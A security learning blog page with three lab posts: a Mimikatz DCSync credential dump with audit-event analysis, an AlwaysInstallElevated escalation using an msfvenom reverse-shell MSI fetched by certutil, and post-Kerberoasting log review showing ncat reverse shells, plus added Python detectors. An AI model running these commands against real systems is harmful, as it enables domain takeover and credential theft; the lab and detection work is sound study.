Sunday, January 2, 2022

Beginning DC Sync - Attack

In this post, I am learning how to perform and detect a DCSync attack using Mimikatz. In a DCSync attack, an ordinary domain-joined computer pretends to be a domain controller: it speaks the Directory Replication Service protocol (MS-DRSR, the DRSUAPI RPC interface) to a real DC and asks it to replicate objects, exactly as a peer DC would. Nothing has to be registered as a DC for this to work; the caller only needs an account that holds the replication rights on the domain (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All), which Domain Admins, Enterprise Admins and the domain controllers themselves have by default. With that, we can request the credential material for a particular user, or for every account in the domain if we wish.

I connected to a workstation as a user with Domain Admin privileges. 

C:\Tools\mimikatz_trunk\x64
λ whoami /upn
admin@securitynik.local

Confirming the group membership.

C:\Tools\mimikatz_trunk\x64
λ net group "Domain Admins" /domain
The request will be processed at a domain controller for domain securitynik.local.

Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
mysqlsvc                 admin                    Administrator

The command completed successfully.

Before going any further, I've configured my Windows Server 2019 domain controller to audit replication activity.

Group Policy Management -> My Domain Policy ("SecurityNik - Default - Domain Policy") -> Computer Configuration -> Advanced Audit Policy Configuration -> Audit Policies -> DS Access:
    Detailed Directory Service Replication: Success and Failure (events 4928-4931 and 4934-4937)
    Directory Service Access: Success and Failure (events 4661 and 4662)
    Directory Service Changes: Success and Failure (events 5136-5139 and 5141)
    Directory Service Replication: Success and Failure (events 4932 and 4933)

Of these, Directory Service Access is the one that records a DCSync: the DC logs a 4662 for the caller that exercised the replication control-access rights on the domain object.

First up, collecting information about a particular user:

C:\Tools\mimikatz_trunk\x64                                                                                  
λ mimikatz.exe "lsadump::dcsync /domain:securitynik.local /user:tq" exit                                     
                                                                                                             
  .#####.   mimikatz 2.2.0 (x64) #19041 May 19 2020 00:48:59                                                 
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)                                                                  
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )                                     
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz                                                       
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )                                    
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/                                    
                                                                                                             
mimikatz(commandline) # lsadump::dcsync /domain:securitynik.local /user:tq                                   
[DC] 'securitynik.local' will be the domain                                                                  
[DC] 'dc-2019.securitynik.local' will be the DC server                                                       
[DC] 'tq' will be the user account                                                                           
                                                                                                             
Object RDN           : tq                                                                                    
                                                                                                             
** SAM ACCOUNT **                                                                                            
                                                                                                             
SAM Username         : tq                                                                                    
User Principal Name  : tq@securitynik.local                                                                  
Account Type         : 30000000 ( USER_OBJECT )                                                              
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )                                        
Account expiration   :                                                                                       
Password last change : 10/16/2021 12:55:37 PM                                                                
Object Security ID   : S-1-5-21-2112827174-2190297626-1763567496-1104                                        
Object Relative ID   : 1104                                                                                  
                                                                                                             
Credentials:                                                                                                 
  Hash NTLM: 23e1d10001876b0078a9a779017fc026                                                                
    ntlm- 0: 23e1d10001876b0078a9a779017fc026                                                                
    ntlm- 1: 23e1d10001876b0078a9a779017fc026                                                                
    lm  - 0: 28efaa5798e5b2fedee619ea7e0116d4                                                                
    lm  - 1: df03317c4db79c05f4db99852f01f006                                                                
                                                                                                             
Supplemental Credentials:                                                                                    
* Primary:NTLM-Strong-NTOWF *                                                                                
    Random Value : 81800db4fa61ba2c6cf2164e34759c2a                                                          
...

Looking specifically at the Security event log for events with ID 4928 (Detailed Directory Service Replication), we see the various naming contexts being replicated with SECURITYNIK-WIN. This device is my Windows 10 host and is not a domain controller.

An Active Directory replica source naming context was established.

Destination DRA:	CN=NTDS Settings,CN=DC-2019,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=securitynik,DC=local
Source DRA:	CN=NTDS Settings,CN=SECURITYNIK-WIN,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=securitynik,DC=local
Source Address:	1151663f-94af-4319-a8ad-435763db3875._msdcs.securitynik.local
Naming Context:	CN=Schema,CN=Configuration,DC=securitynik,DC=local
Options:		2147484016
Status Code:	0

An Active Directory replica source naming context was established.

Destination DRA:	CN=NTDS Settings,CN=DC-2019,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=securitynik,DC=local
Source DRA:	CN=NTDS Settings,CN=SECURITYNIK-WIN,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=securitynik,DC=local
Source Address:	1151663f-94af-4319-a8ad-435763db3875._msdcs.securitynik.local
Naming Context:	DC=securitynik,DC=local
Options:		368
Status Code:	0

Looking at Event 1548 in the Directory Service log, we see:

During replication, Active Directory Domain Services found the following object or its parent object in a directory partition on the local domain controller that is different from the following directory partition from which changes are being replicated. This can occur when the object or its parent object has been moved across partitions. However, due to replication latency, one of the directory servers has not yet received notification of the move. 
 
Object:
CN=tq,OU=SecurityNik-Users,DC=securitynik,DC=local 
Object GUID:
7b76ce2a-c5d9-42ec-b246-cba68d5d23ee 
Parent object GUID (if available):
9234d83c-d3fc-49c0-8024-2eee57d9179b 
Directory partition:
CN=Configuration,DC=securitynik,DC=local 
Source directory server:
1151663f-94af-4319-a8ad-435763db3875._msdcs.securitynik.local 
 
Replication of this directory partition from this source directory server cannot continue at this time. This condition is transient. An attempt to replicate this directory partition will be tried again later.

Looking at event 2088, we see:

Invalid DNS configuration may be affecting other essential operations on member computers, domain controllers or application servers in this Active Directory Domain Services forest, including logon authentication or access to network resources. 
 
You should immediately resolve this DNS configuration error so that this domain controller can resolve the IP address of the source domain controller using DNS. 
 
Alternate server name: 
 SECURITYNIK-WIN10.securitynik.local 
Failing DNS host name: 
 1151663f-94af-4319-a8ad-435763db3875._msdcs.securitynik.local 

The attempt to establish a replication link for the following writable directory partition failed. 
 
Directory partition: 
CN=Configuration,DC=securitynik,DC=local 
Source directory service: 
CN=NTDS Settings,CN=SECURITYNIK-WIN,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=securitynik,DC=local 
Source directory service address: 
1151663f-94af-4319-a8ad-435763db3875._msdcs.securitynik.local 
Intersite transport (if any): 

The attempt to establish a replication link for the following writable directory partition failed. 
 
Directory partition: 
CN=Configuration,DC=securitynik,DC=local 
Source directory service: 
CN=NTDS Settings,CN=SECURITYNIK-WIN,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=securitynik,DC=local 
Source directory service address: 
1151663f-94af-4319-a8ad-435763db3875._msdcs.securitynik.local 
Intersite transport (if any): 

There were quite a few errors about this failing in the Directory Service log, which might suggest this is a potential issue.
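Detection logic for the event a DCSync itself produces, added here as an example that is not part of the original post. With Directory Service Access auditing on, the DC logs a 4662 for the caller that exercised the replication control-access rights; the script parses exported 4662 text and flags any principal other than a known DC computer account. The two sample events are constructed in the 4662 layout: the three rights GUIDs are the real extended-right GUIDs, while the domain object GUID, the logon ID and the list of DC accounts (assumed to be just DC-2019$, the page's DC) are made up for the example. Worth keeping in mind when reading the 4928 entries above: a plain lsadump::dcsync never creates an NTDS Settings object for the caller, so a workstation showing up as a replica source is the trace of a rogue DC registration, the DCShadow technique the references below describe, rather than of the DCSync call.

```python
import re
from typing import Dict, Iterable, List

# Extended-right GUIDs a caller needs to pull secrets over DRSUAPI GetNCChanges.
# They appear under "Properties" in the 4662 the DC logs for the caller.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100  # ADS_RIGHT_DS_CONTROL_ACCESS bit in "Access Mask"


def parse_event(text: str) -> Dict[str, str]:
    """Flatten the 'Key:<tab>Value' lines of an exported event into a dict (first wins)."""
    fields: Dict[str, str] = {}
    for line in text.splitlines():
        m = re.match(r"\s*([A-Za-z][A-Za-z ]*?)\s*:\s*(.*?)\s*$", line)
        if m and m.group(2):
            fields.setdefault(m.group(1), m.group(2))
    return fields


def replication_rights(text: str) -> List[str]:
    """Names of the replication rights among the GUIDs listed under Properties."""
    guids = [g.lower() for g in re.findall(r"\{([0-9a-fA-F-]{36})\}", text)]
    return [REPLICATION_RIGHTS[g] for g in guids if g in REPLICATION_RIGHTS]


def is_dcsync(text: str, dc_accounts: Iterable[str]) -> bool:
    """True when a principal other than a DC exercised a replication right on the DS."""
    f = parse_event(text)
    if f.get("Object Server") != "DS":
        return False
    try:
        mask = int(f.get("Access Mask", "0"), 16)
    except ValueError:
        return False
    if not (mask & CONTROL_ACCESS) or not replication_rights(text):
        return False
    # DCs replicate with each other all day; only flag everyone else.
    return f.get("Account Name", "").upper() not in {a.upper() for a in dc_accounts}


def scan(events: Iterable[str], dc_accounts: Iterable[str]) -> List[Dict[str, object]]:
    """One finding per event that looks like a DCSync."""
    dcs = list(dc_accounts)
    findings: List[Dict[str, object]] = []
    for ev in events:
        if is_dcsync(ev, dcs):
            f = parse_event(ev)
            findings.append({"account": f.get("Security ID"), "logon_id": f.get("Logon ID"),
                             "rights": replication_rights(ev)})
    return findings


# Constructed sample events (not from the page's DC). The first is the shape a
# lsadump::dcsync run by SECURITYNIK\admin leaves behind; the second is routine
# replication by the DC's own computer account. Object Name and Logon ID are made up.
SAMPLE_DCSYNC = """An operation was performed on an object.

Subject :
\tSecurity ID:\t\tSECURITYNIK\\admin
\tAccount Name:\t\tadmin
\tAccount Domain:\t\tSECURITYNIK
\tLogon ID:\t\t0x1A2B3C

Object:
\tObject Server:\t\tDS
\tObject Type:\t\t%{19195a5b-6da0-11d0-afd3-00c04fd930c9}
\tObject Name:\t\t%{0c2ae1b1-8ee9-4b5d-8f7c-59eaa1c2d0aa}
\tHandle ID:\t\t0x0

Operation:
\tOperation Type:\t\tObject Access
\tAccesses:\t\tControl Access
\tAccess Mask:\t\t0x100
\tProperties:\t\tControl Access
\t\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}
\t\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
\t\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}
"""
SAMPLE_DC_REPLICATION = (SAMPLE_DCSYNC
                         .replace("SECURITYNIK\\admin", "SECURITYNIK\\DC-2019$")
                         .replace("Account Name:\t\tadmin", "Account Name:\t\tDC-2019$"))
KNOWN_DCS = ["DC-2019$"]  # assumption: the lab's only DC, the dc-2019 host from the page

if __name__ == "__main__":
    for hit in scan([SAMPLE_DCSYNC, SAMPLE_DC_REPLICATION], KNOWN_DCS):
        print(f"possible DCSync by {hit['account']} (logon {hit['logon_id']}): {hit['rights']}")
```

The DC filter is deliberately a list of computer accounts rather than a trailing-`$` test: a service account or an attacker-created machine account also ends in `$`, and DCSync from a machine account is a known evasion.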

References:
https://www.blackhat.com/docs/us-14/materials/us-14-Duckwall-Abusing-Microsoft-Kerberos-Sorry-You-Guys-Don't-Get-It.pdf
https://stealthbits.com/blog/dcshadow-attacking-active-directory-rogue-dcs/
https://pentestlab.blog/2018/04/16/dcshadow/
https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4928

Beginning exploitation of AlwaysInstallElevated

The AlwaysInstallElevated policy directs Windows Installer to run every package install with SYSTEM privileges, regardless of which user launched it. An unprivileged user can therefore get code running as SYSTEM simply by installing a package they built themselves.

Microsoft does not recommend enabling it today. However, it is something I'm learning more about as I pursue my GPEN.

To be able to leverage this facility, the AlwaysInstallElevated value (REG_DWORD set to 1) needs to exist under both of the following keys. The policy is only honoured when both are set; the HKCU value alone, which any user can write, does nothing:

HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer

Checking to see if it is set under HKLM.

C:\>reg query HKLM\Software\Policies\Microsoft\Windows\Installer /s /f AlwaysInstallElevated
End of search: 0 match(es) found.

Nothing found under HKLM, checking HKCU.

C:\>reg query HKCU\Software\Policies\Microsoft\Windows\Installer /s /f AlwaysInstallElevated
End of search: 0 match(es) found.

Nothing found. Now I'm going to add the values, so that I can test the vulnerability.

C:\>reg ADD HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /d 1 /t REG_DWORD
The operation completed successfully.

C:\>reg ADD HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /d 1 /t REG_DWORD
The operation completed successfully.

Verifying the entries have been created.

C:\>reg query HKLM\Software\Policies\Microsoft\Windows\Installer

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1


C:\>reg query HKCU\Software\Policies\Microsoft\Windows\Installer

HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
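A check that mirrors what the two reg queries above establish, added as an example and not part of the original post: Windows Installer only honours the policy when the value is 1 under both hives, so reading one hive is not enough. The script parses saved reg query output (the sample outputs are constructed in the format shown above) and, when run on Windows, can also read the live registry through winreg. The key path and value name are those from the Microsoft reference linked at the end of this post.

```python
import re
from typing import Dict, Optional

POLICY_KEY = r"Software\Policies\Microsoft\Windows\Installer"
VALUE_NAME = "AlwaysInstallElevated"


def parse_reg_query(output: str) -> Dict[str, int]:
    """Collect REG_DWORD values from `reg query` output; '0 match(es) found' yields {}."""
    values: Dict[str, int] = {}
    for m in re.finditer(r"^\s+(\S+)\s+REG_DWORD\s+0x([0-9a-fA-F]+)\s*$", output, re.M):
        values[m.group(1).lower()] = int(m.group(2), 16)
    return values


def hive_enabled(output: str) -> bool:
    """True when this hive's output shows AlwaysInstallElevated = 0x1 (not merely present)."""
    return parse_reg_query(output).get(VALUE_NAME.lower()) == 1


def always_install_elevated(hklm_output: str, hkcu_output: str) -> bool:
    """The policy is effective only when HKLM and HKCU both carry the value 1."""
    return hive_enabled(hklm_output) and hive_enabled(hkcu_output)


def live_check() -> Optional[bool]:
    """Same decision read from the registry itself; None when not running on Windows."""
    try:
        import winreg
    except ImportError:
        return None

    def enabled(hive: int) -> bool:
        try:
            with winreg.OpenKey(hive, POLICY_KEY) as key:
                value, kind = winreg.QueryValueEx(key, VALUE_NAME)
                return kind == winreg.REG_DWORD and value == 1
        except OSError:          # key or value absent: policy not set in this hive
            return False

    return enabled(winreg.HKEY_LOCAL_MACHINE) and enabled(winreg.HKEY_CURRENT_USER)


# Constructed sample outputs in the layout `reg query` prints (not captured from the page's host).
HKLM_SET = """
HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

"""
HKCU_SET = HKLM_SET.replace("HKEY_LOCAL_MACHINE", "HKEY_CURRENT_USER")
HKCU_UNSET = "End of search: 0 match(es) found.\n"
HKCU_ZERO = HKCU_SET.replace("0x1", "0x0")

if __name__ == "__main__":
    print("both hives set :", always_install_elevated(HKLM_SET, HKCU_SET))    # True
    print("HKCU missing   :", always_install_elevated(HKLM_SET, HKCU_UNSET))  # False
    print("HKCU set to 0  :", always_install_elevated(HKLM_SET, HKCU_ZERO))   # False
    print("live registry  :", live_check())
```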

With the two entries in place, time to create a malicious MSI package via msfvenom.

┌──(root💀securitynik)-[~/Downloads]
└─# msfvenom --platform windows --arch x64 --payload windows/x64/shell_reverse_tcp LHOST=10.0.0.107 LPORT=9999 --format msi --out malicious.msi --smallest
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of msi file: 159744 bytes
Saved as: malicious.msi

Set up a listener on port 9999.

┌──(root💀securitynik)-[~/Downloads]
└─# ncat --verbose --listen 9999
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999

Set up a web server to host the malicious file.

┌──(root💀securitynik)-[~/Downloads]
└─# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

Before downloading the file, and since this is about privilege escalation, time to verify the privileges this user has.

C:\tmp>whoami
sec560student\sec560


C:\tmp>whoami /groups

GROUP INFORMATION
-----------------

Group Name                                                    Type             SID          Attributes           
============================================================= ================ ============ ==================================================
Everyone                                                      Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114    Group used for deny only
BUILTIN\Administrators                                        Alias            S-1-5-32-544 Group used for deny only
BUILTIN\Users                                                 Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE                                      Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                                                 Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users                              Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                                Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account                                    Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                                         Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication                              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level                        Label            S-1-16-8192  

Note that BUILTIN\Administrators appears but is marked "Group used for deny only", and the integrity level is Medium: this is a UAC-filtered token, so although sec560 is a local administrator, this process cannot use that membership.

Downloading the file using certutil.

C:\tmp>certutil -URLCache -f http://10.0.0.107:80/malicious.msi malicious.msi
****  Online  ****
CertUtil: -URLCache command completed successfully.

Confirming the file was downloaded.

┌──(root💀securitynik)-[~/Downloads]
└─# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.0.0.110 - - [28/Nov/2021 19:12:25] "GET /malicious.msi HTTP/1.1" 200 -

Running the msiexec command.

C:\tmp>msiexec /quiet /qn /i malicious.msi

At this point, looking at the last command, it looks like nothing happened. Looking back at my ncat session, we see:

┌──(root💀securitynik)-[~/Downloads]
└─# ncat --verbose --listen 9999
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999

Ncat: Connection from 10.0.0.110.
Ncat: Connection from 10.0.0.110:2283.
Microsoft Windows [Version 10.0.18363.1440]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>
C:\WINDOWS\system32>

Voila! We have a shell. Confirming the rights our shell now has.

C:\WINDOWS\system32>whoami                                                                                  
whoami                                                                                                      
nt authority\system 


C:\WINDOWS\system32>whoami /groups
whoami /groups

GROUP INFORMATION
-----------------

Group Name                             Type             SID                                                            Attributes                                        
====================================== ================ ============================================================== ==================================================
Mandatory Label\System Mandatory Level Label            S-1-16-16384                                                                                                     
Everyone                               Well-known group S-1-1-0                                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545                                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                   Well-known group S-1-5-6                                                        Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1                                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11                                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15                                                       Mandatory group, Enabled by default, Enabled group
NT SERVICE\msiserver                   Well-known group S-1-5-80-685333868-2237257676-1431965530-1907094206-2438021966 Enabled by default, Enabled group, Group owner    
LOCAL                                  Well-known group S-1-2-0                                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                 Alias            S-1-5-32-544                                                   Enabled by default, Enabled group, Group owner   

That's it for this post!

References:
https://docs.microsoft.com/en-us/windows/win32/msi/alwaysinstallelevated
https://steflan-security.com/windows-privilege-escalation-alwaysinstallelevated-policy/
https://www.offensive-security.com/metasploit-unleashed/Msfvenom/


Analyzing the logs and packets from a post Kerberoasting activity

In the previous post, I did the Kerberoasting attack. The log entry at the time of running impacket-mssqlclient did not show me anything that I thought was immediately interesting. Actually, it instead surprised me. I was really hoping to see information such as the Workstation Name, Source Network Address and Source Port, especially when the Logon Type is reported as 3 below.

An account was successfully logged on.

Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Logon Information:
	Logon Type:		3
	Restricted Admin Mode:	-
	Virtual Account:		No
	Elevated Token:		Yes

Impersonation Level:		Impersonation

New Logon:
	Security ID:		SECURITYNIK\sql-service
	Account Name:		sql-service
	Account Domain:		SECURITYNIK
	Logon ID:		0x4F4F11
	Linked Logon ID:		0x0
	Network Account Name:	-
	Network Account Domain:	-
	Logon GUID:		{00000000-0000-0000-0000-000000000000}

Process Information:
	Process ID:		0x0
	Process Name:		-

Network Information:
	Workstation Name:	-
	Source Network Address:	-
	Source Port:		-

Detailed Authentication Information:
	Logon Process:		NtLmSsp 
	Authentication Package:	NTLM
	Transited Services:	-
	Package Name (NTLM only):	NTLM V2
	Key Length:		0

This event is generated when a logon session is created. It is generated on the computer that was accessed.
...

Looking at another entry did pique my interest though. Why would sqlservr.exe be spawning cmd.exe with the command line "C:\Windows\system32\cmd.exe" /c whoami? This is definitely more interesting than the above entry.

A new process has been created.

Creator Subject:
	Security ID:		NT SERVICE\MSSQL$SQLEXPRESS
	Account Name:		MSSQL$SQLEXPRESS
	Account Domain:		NT Service
	Logon ID:		0x1718F

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x123c
	New Process Name:	C:\Windows\System32\cmd.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0xa04
	Creator Process Name:	C:\Program Files\Microsoft SQL Server\MSSQL13.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
	Process Command Line:	"C:\Windows\system32\cmd.exe" /c whoami

Next up, we see cmd.exe executing whoami.

A new process has been created.

Creator Subject:
	Security ID:		NT SERVICE\MSSQL$SQLEXPRESS
	Account Name:		MSSQL$SQLEXPRESS
	Account Domain:		NT Service
	Logon ID:		0x1718F

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x1724
	New Process Name:	C:\Windows\System32\whoami.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0x123c
	Creator Process Name:	C:\Windows\System32\cmd.exe
	Process Command Line:	whoami

Here we see the Domain Admins group being enumerated.

A new process has been created.

Creator Subject:
	Security ID:		NT SERVICE\MSSQL$SQLEXPRESS
	Account Name:		MSSQL$SQLEXPRESS
	Account Domain:		NT Service
	Logon ID:		0x1718F

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x360
	New Process Name:	C:\Windows\System32\cmd.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0xa04
	Creator Process Name:	C:\Program Files\Microsoft SQL Server\MSSQL13.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
	Process Command Line:	"C:\Windows\system32\cmd.exe" /c net groups "Domain Admins"

Here we see the host downloading ncat.exe via certutil.

A new process has been created.

Creator Subject:
	Security ID:		NT SERVICE\MSSQL$SQLEXPRESS
	Account Name:		MSSQL$SQLEXPRESS
	Account Domain:		NT Service
	Logon ID:		0x1718F

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x1598
	New Process Name:	C:\Windows\System32\cmd.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0xa04
	Creator Process Name:	C:\Program Files\Microsoft SQL Server\MSSQL13.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
	Process Command Line:	"C:\Windows\system32\cmd.exe" /c certutil -URLCache -F http://10.0.0.107/ncat.exe %TEMP%\ncat.exe

Here is what it looked like when ncat was executed.

A new process has been created.

Creator Subject:
	Security ID:		NT SERVICE\MSSQL$SQLEXPRESS
	Account Name:		MSSQL$SQLEXPRESS
	Account Domain:		NT Service
	Logon ID:		0x1718F

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0xc6c
	New Process Name:	C:\Windows\SERVIC~1\MSSQL$~1\AppData\Local\Temp\ncat.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0x1578
	Creator Process Name:	C:\Windows\System32\cmd.exe
	Process Command Line:	C:\Windows\SERVIC~1\MSSQL$~1\AppData\Local\Temp\ncat.exe  10.0.0.107 443 --ssl --exec cmd.exe
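Turning the entries above into detection logic, as an added example that is not part of the original post. The script parses exported 4688 text (the first occurrence of a field wins, so the Creator Subject is kept and the NULL-SID Target Subject is ignored) and applies three rules, each of which one of the entries above triggers: a shell whose parent is sqlservr.exe, which is what xp_cmdshell looks like from the endpoint; certutil invoked with -URLCache as a downloader; and a binary executed from a Temp directory. The sample events are constructed from the fields shown above. The certutil rule depends on the Process Command Line field, which 4688 only carries when "Include command line in process creation events" is enabled alongside Audit Process Creation.

```python
import re
from typing import Dict, List

SQL_PARENTS = {"sqlservr.exe"}      # xp_cmdshell children are spawned by the SQL Server process
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
TEMP_MARKERS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")


def parse_event(text: str) -> Dict[str, str]:
    """Flatten 'Key:<tab>Value' lines of an exported event; the first occurrence wins,
    so 'Security ID' is the Creator Subject, not the NULL SID of the Target Subject."""
    fields: Dict[str, str] = {}
    for line in text.splitlines():
        m = re.match(r"\s*([A-Za-z][A-Za-z ]*?)\s*:\s*(.*?)\s*$", line)
        if m and m.group(2):
            fields.setdefault(m.group(1), m.group(2))
    return fields


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage_4688(text: str) -> List[str]:
    """Rules that fire on the process-creation trail an xp_cmdshell session leaves."""
    f = parse_event(text)
    parent = basename(f.get("Creator Process Name", ""))
    child_path = f.get("New Process Name", "")
    child = basename(child_path)
    cmdline = f.get("Process Command Line", "").lower()
    hits: List[str] = []
    if parent in SQL_PARENTS and child in SHELLS:
        hits.append(f"shell {child} spawned by {parent} (xp_cmdshell)")
    if "certutil" in cmdline and "-urlcache" in cmdline:
        hits.append("certutil -URLCache used as a downloader")
    if any(marker in child_path.lower() for marker in TEMP_MARKERS):
        hits.append(f"executable launched from a Temp directory: {child_path}")
    return hits


def make_4688(account: str, parent: str, child: str, cmdline: str) -> str:
    """Constructed 4688 text in the layout Event Viewer exports (sample data, not page output)."""
    return (
        "A new process has been created.\n\nCreator Subject:\n"
        f"\tSecurity ID:\t\tNT SERVICE\\{account}\n\tAccount Name:\t\t{account}\n"
        "\tAccount Domain:\t\tNT Service\n\tLogon ID:\t\t0x1718F\n\nTarget Subject:\n"
        "\tSecurity ID:\t\tNULL SID\n\tAccount Name:\t\t-\n\tLogon ID:\t\t0x0\n\n"
        f"Process Information:\n\tNew Process Name:\t{child}\n"
        "\tMandatory Label:\t\tMandatory Label\\High Mandatory Level\n"
        f"\tCreator Process Name:\t{parent}\n\tProcess Command Line:\t{cmdline}\n"
    )


SQLSERVR = r"C:\Program Files\Microsoft SQL Server\MSSQL13.SQLEXPRESS\MSSQL\Binn\sqlservr.exe"
CMD = r"C:\Windows\System32\cmd.exe"
NCAT = r"C:\Windows\SERVIC~1\MSSQL$~1\AppData\Local\Temp\ncat.exe"
SAMPLES = [
    make_4688("MSSQL$SQLEXPRESS", SQLSERVR, CMD, '"C:\\Windows\\system32\\cmd.exe" /c whoami'),
    make_4688("MSSQL$SQLEXPRESS", CMD, r"C:\Windows\System32\whoami.exe", "whoami"),
    make_4688("MSSQL$SQLEXPRESS", SQLSERVR, CMD,
              '"C:\\Windows\\system32\\cmd.exe" /c certutil -URLCache -F http://10.0.0.107/ncat.exe %TEMP%\\ncat.exe'),
    make_4688("MSSQL$SQLEXPRESS", CMD, NCAT, NCAT + " 10.0.0.107 443 --ssl --exec cmd.exe"),
]

if __name__ == "__main__":
    for sample in SAMPLES:
        f = parse_event(sample)
        print(f"{f['Security ID']}: {f['Process Command Line']}")
        for hit in triage_4688(sample):
            print("   !!", hit)
```

The parent-child rule is the durable one: an attacker can rename ncat or fetch it some other way, but xp_cmdshell will always produce a shell whose creator is sqlservr.exe.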

While I was looking at the logs to see what transpired, I was also capturing packets using the following:

┌──(root💀securitynik)-[~/packets]
└─# tcpdump -nnt --interface eth0 -w impacket-sql.pcap '(host 10.0.0.5) and not(arp or ip6 or port(1900))' -vv
tcpdump: listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
^C2841 packets captured
2841 packets received by filter
0 packets dropped by kernel

Interestingly, I thought most of the communication was encrypted, but I was wrong. As I looked at a few packets, I could see the queries I executed.

Looking at the type of packets captured.

┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r impacket-sql.pcap -q -z io,phs

===================================================================
Protocol Hierarchy Statistics
Filter: 

eth                                      frames:2841 bytes:4068111
  ip                                     frames:2841 bytes:4068111
    tcp                                  frames:2835 bytes:4066653
      tds                                frames:90 bytes:460551
        _ws.malformed                    frames:7 bytes:2500
        tcp.segments                     frames:2 bytes:12052
      tds.prelogin                       frames:1 bytes:320
        tds.prelogin                     frames:1 bytes:320
      data                               frames:135 bytes:8100
